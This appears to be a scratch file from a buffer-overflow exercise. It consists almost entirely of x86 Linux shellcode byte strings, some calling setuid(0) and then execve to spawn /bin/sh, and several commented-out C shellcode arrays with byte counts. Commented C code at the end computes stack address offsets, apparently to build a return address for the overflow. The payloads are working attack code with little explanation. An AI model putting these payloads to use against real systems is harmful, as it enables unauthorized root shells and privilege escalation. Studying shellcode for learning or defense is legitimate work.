\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80



\x31\xC0\x89\xC3\xB0\x17\xCD\x80\x5B\x50\x89\xE2\x53\x89\xE1\xB0\x0B\xCD\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80


\xeb\x13\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x5b\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

\x31\xC0\x89\xC3\xB0\x17\xCD\x80\x5B\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

/*
char ans[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
//53
*/

/*
char ans[] = "\x31\xC0\x89\xC3\xB0\x17\xCD\x80\x5B\x50\x89\xE2\x53\x89\xE1\xB0\x0B\xCD\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
//44
*/

/*	char ad[11];
	sprintf(ad, "%p", &ch);
	for(int i=0; i<8; i++){
		ad[i] = ad[i+2];
	}
	ad[8] = '\0';

	printf("%s\n", ad);

	char buf[3];

	int aa[4];

	for(int i=0; i<4; i++){
		buf[0] = ad[i*2];
		buf[1] = ad[i*2+1];
		buf[2] = '\0';
		aa[i] = strtol(buf, NULL, 16);
	}

	for(int i=0; i<4; i++) printf("%x\n", aa[i]);

	if(aa[2] >= 0x07){
		aa[2] = aa[2] - 0x07;
	}
	else{
		if(aa[1] >= 0x01){
			aa[1] = aa[1] = 0x01;
			aa[2] = aa[2] + 0x100 - 0x07;
		}
		else{
			aa[0] = aa[0] = 0x01;
			aa[1] = aa[1] + 0xff;
			aa[2] = aa[2] + 0x100 - 0x07;
		}
	}

	if(aa[3] >= 0xef){
		aa[3] = aa[3] - 0xef;
	}
	else{
		if(aa[2] >= 0x01){
			aa[2] = aa[2] - 0x01;
			aa[3] = aa[3] + 0x100 - 0xef;
		}
		else{
			if(aa[1] >= 0x01){
				aa[1] = aa[1] - 0x01;
				aa[2] = aa[2] + 0xff;
				aa[3] = aa[3] + 0x100 - 0xef;
			}
			else{
				aa[0] = aa[0] - 0x01;
				aa[1] = aa[1] + 0xff;
				aa[2] = aa[2] + 0xff;
				aa[3] = aa[3] + 0x100 - 0xef;
			}
		}
		
	}


	for(int i=0; i<4; i++) printf("%x\n", aa[i]);

	sprintf(ch, "'\x%x'", aa[0]);
	printf("%c\n", ch);

*/